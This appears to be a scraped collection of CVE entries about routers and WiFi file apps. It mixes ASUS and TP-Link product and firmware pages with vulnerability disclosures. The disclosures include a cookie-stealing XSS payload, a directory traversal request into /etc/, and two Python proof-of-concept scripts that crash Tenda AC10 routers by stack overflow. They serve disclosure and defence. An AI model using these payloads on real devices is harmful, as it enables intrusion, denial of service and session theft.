Asus RT-N12E 2.0.0.39 is affected by an incorrect access control vulnerability. Through system.asp / start_apply.htm, an attacker can change the administrator password without any authentication.

Wireless-N300 Router

*   300 Mbps high speed
*   Plug-n-surf CD free installation
*   External 5dBi antenna for better coverage  
    (\*Antenna type will differ according to local regulations and requirement in each country)  
    
*   Power saving: consumes less power during stand by mode
*   Support EZ WPS connection

Awards

"The Asus RT-AX88U is the best choice for a higher end router. It features next generation Wi-Fi 6 (802.11ax) technology, and an impressive eight Gigabit Ethernet ports, which even supports link aggregation. Backing this up is the usual excellent AsusWRT interface, which allows granular control of every imaginable setting. "

"One of the fastest routers we've tested, the Asus ROG Rapture GT-AC5300 offers lots of gamer-friendly features, copious I/O ports, and a slick management console that lets you optimize your network for lag-free gaming."

"The Asus RT-AC86U is a fast AC2900 dual band router that's equipped with the latest networking technology and is loaded with gamer optimization and network protection features."

Today, they’re well known not just for superior wireless performance, but also as one of the few brands that continue to push the latest in standards, security, advanced user customisation and building a robust networking ecosystem through AiMesh functionality to enable compatible ASUS routers to work together in a single SSID.

ASUS’ popularity is most likely due to their focus on powerful hardware with cutting edge networking features across their Wi-Fi 6 range from the flagship ROG Rapture GT-AX11000 to the RT-AX86U.

See all

Media reviews

See all

**Consistently Praised for Networking Excellence!**

**Readers’ Choice, 6 Years Running! (2012-2017)**  
“No brand is more likely to be recommended than ASUS. The company receives excellent marks for their ease of setup and reliability.”– PC Magazine \>>Learn more.

**Recommended Excellence Award for Best Router Brand,** PC Pro Technology Excellence Awards 2016.

ASUS RT-N12E supports 802.11 b/g/n and has 300 Mbps high speed. With CD free easy installation and stable data transmission, RT-N12E is the basic solution for wireless internet setup. It also contents Green WLAN technology so it consumes less power during stand by mode.

**Step1:**

**Step2:**

**Step3:**

Power up the router and launch the browser

Enter the information provided by your ISP

Start surfing!

**Plug-n-Surf Installation**

3-steps is all you need to set up the router. You don't need a CD for installation.

**Save The Planet And Your Pocket**

Compared with generic Wireless-N routers, ASUS ECO-WiFi CPU reduces 72%\* of energy consumption and utility cost.

\* The result given was of an internal testing methods comparing typical router, with standby, normal and heavy traffic. Testing criteria: \[Standby mode\] Only WAN ports are connected. \[Normal traffic\] 1 wired connected PC and 1 wirelessly connected laptop for P2P download. \[Heavy traffic\] 4 wired connected PCs and 2 wirelessly connected laptops for P2P download. Utility cost is calculated based on 2011 US household avg. electricity price, all taxes included.

**Extended Network Coverage**

The RT-N12E features a 5dBi high-gain antenna that boosts the wireless signal, thereby extending coverage range.

\*Antenna type will differ according to local regulations and requirement in each country.

**Network Map-Manual Free Management**

1.  Have a quick overview of the whole network and WAN/LAN status
2.  Manage your network in minutes
3.  Try our EZ UI software

**WPS Function& WPA/WPA2 Encryption**

WEP encryption is not enough for Wi-Fi connection nowadays, and intruders may be able to access your network.Using the WPS function with WPA/WPA2 encryption improves protection for your home networks and private resources.

**Keep Up to Date!**

Remember to always keep your device’s firmware up to date so you can benefit from the very latest service and security enhancements — and get exciting new features! Learn more about updating new firmware.

\*This product does not support universal repeater mode. If needed, please find RT-N10U, RT-N12, RT-N13U, or RT-N15U.

\* ASUS received the highest numerical score among wireless routers in the J.D. Power 2015 Wireless Router Satisfaction Report, based on 2,716 responses from 8 companies measuring satisfaction with wireless routers surveyed November-December 2015. Your experiences may vary. Visit jdpower.com

CVE-2020-23648: RT-N12E｜WiFi Routers｜ASUS Global

TP-Link AX10v1 V1_211117 allows attackers to execute a replay attack by using a previously transmitted encrypted authentication message and valid authentication token. Attackers are able to login to the web application as an admin user.

**Setup Video**

*   **How to Set up Address Reservation on TP-Link Routers Windows**
    
    This video will show you how to set up Address Reservation on TP-Link routers.
    
    More Fold
    
*   **How to Set up OpenVPN on TP-Link Routers Windows**
    
    This video will show you how to set up OpenVPN on a TP-Link Wi-Fi router. For more information, visit www.tp-link.com/support.
    
    More Fold
    
*   **How to setup PPTP VPN on TP Link routers Windows**
    
    This video will show you how to set up PPTP VPN on a TP-Link Wi-Fi router. For more information, visit www.tp-link.com/support
    
    More Fold
    
*   **How to Setup A TP-Link WiFi 6 Router**
    
    This setup guide will show you how quickly and easily you can setup your new TP-Link WiFi 6 router.
    
    More Fold
    
*   **What should I do if I cannot access the internet? - Using a DSL modem and a TP-Link router**
    
    If you can’t access the internet using a DSL modem and TP-Link router, this video can help you solve the problem.
    
    More Fold
    
*   **What should I do if I cannot access the internet? - Using a cable modem and a TP-Link router**
    
    If you can’t access the internet using a cable modem and TP-Link router, follow this video step by step to solve your problem.
    
    More Fold
    
*   **TP Link Archer AX Series Unboxing and Setup (for Archer AX10, etc.)**

**Firmware**

A firmware update can resolve issues that the previous firmware version may have and improve its current performance.

**To Upgrade**

**IMPORTANT:** To prevent upgrade failures, please read the following before proceeding with the upgrade process

*   **Please upgrade firmware from the local TP-Link official website of the purchase location for your TP-Link device, otherwise it will be against the warranty. Please click here to change site if necessary.**
*   Please verify the hardware version of your device for the firmware version. Wrong firmware upgrade may damage your device and void the warranty. (**Normally Vx.0=Vx.6/Vx.8 (eg:V1.0=V1.6/V1.8);   Vx.x0=Vx.x6/Vx.x8 (eg:V1.20=V1.26/V1.28)**  
    How to find the hardware version on a TP-Link device
*   **Do NOT turn off the power during the upgrade process, as it may cause permanent damage to the product.**
*   To avoid wireless disconnect issue during firmware upgrade process, it's recommended to upload firmware with wired connection unless there is no LAN/Ethernet port on your TP-Link device.
*   It's recommended that users stop all Internet applications on the computer, or simply disconnect Internet line from the device before the upgrade.
*   Use decompression software such as WinZIP or WinRAR to extract the file you download before the upgrade.

More Fold

Archer AX10(US)\_V1\_220401

Download

**Important Notice**

Please upgrade firmware/software from the local TP-Link official website of the purchase location for your TP-Link device, otherwise it may cause upgrade failure or mistakes and be against the warranty.

Still Download  Go to Local Website

Published Date: 2022-05-11

Language: Multi-language

File Size: 15.82 MB

New Features:  
1\. Added support for Agile Config feature;  
2\. Added support for TR-069 feature.

Archer AX10(US)\_V1\_211117

Download

**Important Notice**

Please upgrade firmware/software from the local TP-Link official website of the purchase location for your TP-Link device, otherwise it may cause upgrade failure or mistakes and be against the warranty.

Still Download  Go to Local Website

Published Date: 2021-11-30

Language: English

File Size: 15.66 MB

Release Note:  
Bug Fixed:  
1\. Fixed some GDPR Encryption vulnerabilities;  
2\. Fixed abnormal DHCP lease renewal;  
3\. Fixed HTTP smuggling attack vulnerability;  
4\. Fixed HTTP/0.9 request vulnerability.

Archer AX10(US)\_V1\_211014

Download

**Important Notice**

Please upgrade firmware/software from the local TP-Link official website of the purchase location for your TP-Link device, otherwise it may cause upgrade failure or mistakes and be against the warranty.

Still Download  Go to Local Website

Published Date: 2021-11-17

Language: Multi-language

File Size: 15.66 MB

New Features/Enhancement:  
1.Optimized VPN Server feature;  
2.Updated dropbear version and changed the dropbear port;  
3.Updated openssl version;  
4.Improved the stability of OneMesh feature;  
5.Improved the wireless stability.

Bug Fixed:  
1.Fixed the bugs on the Web UI;  
2.Fixed security vulnerabilities;  
3.Fixed the bugs related to dnsmasq;  
4.Fixed the bug that the router can't get WAN IP in some cases;  
5.Fixed the bug related to DMZ;  
6.Fixed the bugs related to AP mode;  
7.Fixed the bug that QoS can't work in some cases;  
8.Fixed the bugs on Tether App;  
9.Fixed WPA3-SAE DOS attack vulnerability;  
10.Fixed the bugs related to WPS.

**To Use Third Party Firmware In TP-Link Products**

Some official firmware of TP-Link products can be replaced by the third party firmware such as DD-WRT. TP-Link is not obligated to provide any maintenance or support for it, and does not guarantee the performance and stability of third party firmware. Damage to the product as a result of using third party firmware will void the product's warranty.

**Open Source Code For Programmers (GPL)**

Please note: The products of TP-Link partly contain software code developed by third parties, including software code subject to the GNU General Public Licence (“GPL“), Version 1/Version 2/Version 3 or GNU Lesser General Public License ("LGPL"). You may use the respective software condition to following the GPL licence terms.

You can review, print and download the respective GPL licence terms here. You receive the GPL source codes of the respective software used in TP-Link products for direct download and further information, including a list of TP-Link software that contain GPL software code under GPL Code Center.

The respective programs are distributed WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the respective GNU General Public License for more details.

**Apps**

TP-Link Tether

TP-Link Tether provides the easiest way to access and manage your network with your iOS or Android devices. Learn more about TP-Link Tether and Compatible Devices

*   
*   

Note: To use Tether, please update your TP-Link device’s firmware to the latest version.

**Emulators**

Firmware Version

Working Mode

Language

190321(US)

\-

English

Browse

**Note:**

1\.  The emulator is a virtual web GUI where you can experience the TP-Link product management panel.

2\. The listed emulators might not have the latest firmware.

3\.  The features displayed are for reference, and their availability may depend on local regulations. For more information, please refer to the datasheet or product page.

CVE-2022-41541: Download for  Archer AX10 | TP-Link

Tenda AC15 V15.03.05.18 was discovered to contain a stack overflow via the timeZone parameter in the form_fast_setting_wifi_set function.

CVE-2022-43259

RRX IOB LP version 1.0 suffers from a DNS cache snooping vulnerability.

    Document Title:===============RRX IOB LP v1.0 - DNS Cache Snooping VulnerabilityReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2261Article:https://www.vulnerability-db.com/?q=articles/2022/10/11/rhein-ruhr-express-rrx-dns-cache-snooping-vulnerability-wifi-hotspotRelease Date:=============2022-10-11Vulnerability Laboratory ID (VL-ID):====================================2261Common Vulnerability Scoring System:====================================5.3Vulnerability Class:====================MultipleCurrent Estimated Price:========================2.000€ - 3.000€Product & Service Introduction:===============================This product, solution or service ("Product") contains third-party software components listed in this document. These components are Open SourceSoftware licensed under a license approved by the Open Source Initiative (www.opensource.org) or similar licenses as determined by SIEMENS ("OSS")and/or commercial or freeware software components. With respect to the OSS components, the applicable OSS license conditions prevail over any otherterms and conditions covering the Product. The OSS portions of this Product are provided royalty-free and can be used at no charge.If SIEMENS has combined or linked certain components of the Product with/to OSS components licensed under the GNU LGPL version 2 or later as per thedefinition of the applicable license, and if use of the corresponding object file is not unrestricted ("LGPL Licensed Module", whereas the LGPLLicensed Module and the components that the LGPL Licensed Module is combined with or linked to is the "Combined Product"), the following additionalrights apply, if the relevant LGPL license criteria are met: (i) you are entitled to modify the Combined Product for your own use, including but notlimited to the right to modify the Combined Product to relink modified versions of the LGPL Licensed Module, and (ii) you may reverse-engineer theCombined Product, but only to debug your modifications. The modification right does not include the right to distribute such modifications and youshall maintain in confidence any information resulting from such reverse-engineering of a Combined Product.Certain OSS licenses require SIEMENS to make source code available, for example, the GNU General Public License, the GNU Lesser General Public Licenseand the Mozilla Public License. If such licenses are applicable and this Product is not shipped with the required source code, a copy of this sourcecode can be obtained by anyone in receipt of this information during the period required by the applicable OSS licenses by contacting the following address.Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered a dns snooping vulnerability in the Rhein Ruhr Express (RRX IOB Landing Page 1.0 - Open Source Software) with Hotspot Siemens Portal.Vulnerability Disclosure Timeline:==================================2020-08-03: Researcher Notification & Coordination (Security Researcher)2020-08-04: Vendor Notification (Security Department)2020-08-27: Vendor Response/Feedback #1 (Security Department)2020-11-10: Vendor Response/Feedback #2 (Security Department)2021-01-30: Security Acknowledgements (Security Department)2022-10-09: Vendor Fix/Patch by Check (Service Developer Team)2022-10-11: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============MediumAuthentication Type:====================Restricted Authentication (Guest Privileges)User Interaction:=================No User InteractionDisclosure Type:================Responsible DisclosureTechnical Details & Description:================================A dns cache snooping vulnerability has been discovered in the official Rhein Ruhr Express (RRX IOB Landing Page 1.0 - Open Source Software) with Hotspot Siemens Portal.The vulnerability allows remote attackers to determine resolved sites and name servers to followup with manipulative interactions.The vulnerability allows remote attackers to determine which domains have recently been resolved via this name server, and therefore which hosts have been recently visited.For instance, if an attacker was interested in whether your company utilizes the online services of a particular financial institution, they would be able to use this attackto build a statistical model regarding company usage of that financial institution. Of course, the attack can also be usead to find B2B partners, web-surfing patterns, externalmail servers, and more. If this is an internal DNS server not accessible to outside networks, attacks would be limited to the internal network. This may include employees,consultants and potentially users on a guest network or WiFi connection if supported.Proof of Concept (PoC):=======================The dns cache snooping vulnerability can be exploited by remote attackers with wifi guest access without user interaction or privileged user account.For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.--- PoC Session Logs ---Sent a non-recursive query for test.comand received 1 answer: dnsmasq-2.7593.184.216.34Hosts53 / udp / dns   192.168.44.1Solution - Fix & Patch:=======================Improve the cache management via dns to ensure no manipulations can take place.Contact the manufacturer siemens to resolve the issue by an automated or manual patch.2022-10-09: Vendor Fix/Patch by Check (Service Developer Team)The patching process will be delivered by siemens during train maintenance and will take at least until 2022 Q2-Q3 to be rolled out on all trains (40+).Security Risk:==============The security risk of the web vulnerability in the siemens hotspot rxx wifi is estimated as medium.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:www.vulnerability-lab.com    www.vuln-lab.com        www.vulnerability-db.comServices:   magazine.vulnerability-lab.com  paste.vulnerability-db.com       infosec.vulnerability-db.comSocial:      twitter.com/vuln_lab    facebook.com/VulnerabilityLab       youtube.com/user/vulnerability0labFeeds:      vulnerability-lab.com/rss/rss.php   vulnerability-lab.com/rss/rss_upcoming.php   vulnerability-lab.com/rss/rss_news.phpPrograms:   vulnerability-lab.com/submit.php   vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.phpAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

RRX IOB LP 1.0 DNS Cache Snooping

WiFi File Transfer version 1.0.8 suffers from a cross site scripting vulnerability.

Document Title:  
===============  
WiFi File Transfer v1.0.8 - Cross Site Scripting Vulnerabilities

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2322

Release Date:  
=============  
2022-10-17

Vulnerability Laboratory ID (VL-ID):  
====================================  
2322

Common Vulnerability Scoring System:  
====================================  
5.6

Vulnerability Class:  
====================  
Cross Site Scripting - Persistent

Current Estimated Price:  
========================  
500€ - 1.000€

Product & Service Introduction:  
===============================  
WiFi File Transfer lets you transfer files to/from your phone or tablet via WiFi. Easy to use web interface, no USB cable required.

(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.smarterdroid.wififiletransfer&hl=de&gl=US  )

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered a multiple persistent cross site vulnerabilities in the WiFi File Transfer v1.0.8 mobile android web-application.

Affected Product(s):  
====================  
smarterDroid  
Product: WiFi File Transfer v1.0.8 - Android (Wifi) (Web-Application)

Vulnerability Disclosure Timeline:  
==================================  
2022-10-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Remote

Severity Level:  
===============  
Medium

Authentication Type:  
====================  
Open Authentication (Anonymous Privileges)

User Interaction:  
=================  
Low User Interaction

Disclosure Type:  
================  
Independent Security Research

Technical Details & Description:  
================================  
A persistent input validation web vulnerability has been discovered in the WiFi File Transfer v1.0.8 mobile web-application for android.  
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application  
requests from the application-side.

The vulnerabilities are located in the data_file parameter of the add a file or folder and create a zip file function.  
Attackers with wifi access are able to anonymous use the webui and can inject own malicious script code with persistent  
attack vector via post method request.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external  
redirects to malicious source and persistent manipulation of affected application modules.

Proof of Concept (PoC):  
=======================  
The persistent post inject web vulnerabilities can be exploited by remote attackers in the same wifi network with anonymous privileges and low user interaction.  
For security demonstration or to reproduce the web security vulnerability in the application follow the provided information and steps below to continue.

Manual reproduce of the vulnerability ...  
1. Install the mobile android application and start it  
2. Start the wifi web-server  
3. Login as attacker by the browser over the network  
4. Inject payload as folder name, file name or zip file and save via post method request  
5. The payload executes in the web ui when previewing the paths

Exploitation: Payload  
<a onmouseover=alert(document.cookie)>picture1337.jpg</a>

--- PoC Session Logs #1 (POST) [Add] [Create] [Folder] [data_file] ---  
http://localhost:1234/storage/emulated/0/DCIM/  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------321836412920954805143620932676  
Content-Length: 613  
Origin:http://localhost:1234  
Connection: keep-alive  
Referer:http://localhost:1234/storage/emulated/0/DCIM/  
action=mkdir&data_file=New"><a onmouseover=alert(document.cookie)>picture1337.jpg</a>&data_currentParams=?&data_filepath=/storage/emulated/0/DCIM/  
-  
POST: HTTP/1.1 302 OK  
Connection: Close  
Content-Type: text/html  
Location:http://localhost:1234/storage/emulated/0/DCIM/  
Content-Length: 143  
-  
http://localhost:1234/storage/emulated/0/DCIM/  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Referer:http://localhost:1234/storage/emulated/0/DCIM/  
Connection: keep-alive  
-  
POST: HTTP/1.1 200 OK  
Connection: Close  
Content-Type: text/html

--- PoC Session Logs #2 (POST) [Add] [Create] [Zip] [data_file] ---  
http://localhost:1234/storage/emulated/0/Pictures/?  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------289297208414223233314228108045  
Content-Length: 882  
Origin:http://localhost:1234  
Connection: keep-alive  
Referer:http://localhost:1234/storage/emulated/0/Pictures/?  
Upgrade-Insecure-Requests: 1  
action=multizip&data_file=.<a onmouseover=alert(document.cookie)>File.Zip</a>.Zip&data_currentParams=?&data_filepath=/storage/emulated/0/Pictures/&1.jpg=file&2.jpg=file  
-  
POST: HTTP/1.1 200 OK  
Connection: Close  
Content-Type: text/html  
Location:http://localhost:1234/storage/emulated/0/Pictures/  
Content-Length: 151  
-  
http://localhost:1234/storage/emulated/0/Pictures/  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Referer:http://localhost:1234/storage/emulated/0/Pictures/?  
Connection: keep-alive  
Upgrade-Insecure-Requests: 1  
-  
POST: HTTP/1.1 200 OK  
Connection: Close  
Content-Type: text/html

Reference(s):  
http://localhost:1234/  
http://localhost:1234/storage/  
http://localhost:1234/storage/emulated/  
http://localhost:1234/storage/emulated/0/  
http://localhost:1234/storage/emulated/0/DCIM/  
http://localhost:1234/storage/emulated/0/Pictures/

Solution - Fix & Patch:  
=======================  
The persistent web vulnerabilities can be resolved by the following steps ...  
1. Restrict the input of the folder, filename and zip files to disallow special chars for add or create process  
2. Encode and escape the content of the data_file parameter to sanitize the content  
3. Sanitize and filter the output locations of the explorer path listings to prevent further attacks

Security Risk:  
==============  
The security risk of the persistent web vulnerabilities in the mobile android wifi web-application are estimated as medium.

Credits & Authors:  
==================  
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

WiFi File Transfer 1.0.8 Cross Site Scripting

Webile version 1.0.1 suffers from a directory traversal vulnerability.

    Document Title:===============Webile v1.0.1 - Directory Traversal Web VulnerabilityReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2320Release Date:=============2022-10-10Vulnerability Laboratory ID (VL-ID):====================================2320Common Vulnerability Scoring System:====================================7.3Vulnerability Class:====================Directory- or Path-TraversalCurrent Estimated Price:========================1.000€ - 2.000€Product & Service Introduction:===============================Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server inthe local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data,statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and otherfunctions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac,Windows, Linux, iOS, Android and other multi-platform operating systems.(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the Webile v1.0.1 Wifi mobile web application.Affected Product(s):====================Product Owner: WebileProduct: Webile v1.0.1 - (Framework) (Mobile Web-Application)Vulnerability Disclosure Timeline:==================================2022-02-06: Researcher Notification & Coordination (Security Researcher)2022-02-07: Vendor Notification (Security Department)2022-**-**: Vendor Response/Feedback (Security Department)2022-**-**: Vendor Fix/Patch (Service Developer Team)2022-**-**: Security Acknowledgements (Security Department)2022-10-10: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============HighAuthentication Type:====================Open Authentication (Anonymous Privileges)User Interaction:=================No User InteractionDisclosure Type:================Independent Security ResearchTechnical Details & Description:================================A directory traversal web vulnerability has been discovered  in the Webile v1.0.1 wifi mobile web application.The vulnerability allows remote attackers to change the application path in performed requests to compromise thelocal application or file-system of a mobile device. Attackers are for example able to request environmentvariables or a sensitive system path.The directory-traversal web vulnerability is located in the insecure web-server configuration. The path of the local user is notsecure restricted and validated. Thus allows an unauthenticated user with wifi access to request local web-server files withoutsecure permission. The bug itself is located in the filepath parameter of the change_upload_dir function.Exploitation of the directory traversal web vulnerability requires no privileged web-application user account or user interaction.Successful exploitation of the vulnerability results in information leaking by unauthorized file access and mobile application compromise.Proof of Concept (PoC):=======================The directory traversal web vulnerability can be exploited by remote attackers without user account or user interaction.For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.PoC: Exploitationhttp://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/--- PoC Session Logs ---http://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/Host: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6Upgrade-Insecure-Requests: 1-GET: HTTP/1.1 200 OKContent-Type: text/html; charset=UTF-8Connection: keep-aliveContent-Encoding: gzipTransfer-Encoding: chunked--- FS Session Logs ---Output:File name   bluetoothbpfcarriercompatconfiginitpermissionspppseccomp_policysecurityselinuxsensorssysconfigtextclassifierthemevintfepdgipmSecurity Risk:==============The security risk of the directory traversal web vulnerability in the mobile web application is estimated as high.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Webile 1.0.1 Directory Traversal

Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/addWifiMacFilter.

Permalink

Cannot retrieve contributors at this time

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/addWifiMacFilter, device\_mac, device\_id are controllable and will be copied to mib\_value by sprintf. It is worth noting that the size is not checked, resulting in a stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'device\_id=1&device\_mac=' + p1

p3 \= b"POST /goform/addWifiMacFilter" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-42169: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/formWifiWpsStart.

Permalink

Cannot retrieve contributors at this time

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/WifiWpsStart，The index and mode are controllable. If the conditions are met to sprintf, they will be spliced into tmp. It is worth noting that there is no size check,which leads to a stack overflow vulnerability.

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'mode=1&index=' + p1

p3 \= b"POST /goform/WifiWpsStart" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-42170: IOT_Vul/readme.md at main · z1r00/IOT_Vul

An issue was discovered in the Linux kernel before 5.19.16. Attackers able to inject WLAN frames could cause a buffer overflow in the ieee80211_bss_info_update function in net/mac80211/scan.c.

